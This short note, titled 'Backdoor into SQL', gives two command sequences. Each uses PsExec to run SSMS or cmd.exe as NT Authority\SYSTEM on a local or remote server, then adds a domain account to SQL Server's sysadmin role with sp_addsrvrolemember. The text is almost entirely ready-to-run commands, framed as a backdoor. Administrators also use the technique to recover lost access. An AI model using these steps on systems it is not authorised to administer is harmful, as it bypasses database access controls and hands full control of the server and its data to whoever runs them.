Command Line: Backdoor into SQL

PSEXEC -s -i ssms.exe
EXEC
sys.sp_addsrvrolemember @loginame = N'CHNET\ADMINUser', @rolename = N'sysadmin';


OR

PSEXEC -s -i \\server cmd.exe
osql
-E -Q "EXEC sys.sp_addsrvrolemember @loginame = N'CHNET\AdminUser', @rolename = N'sysadmin';"

.

.

Use PSTools' PSEXEC with the -s -i option to run SSMS and you'll have "NT Authority\SYSTEM access"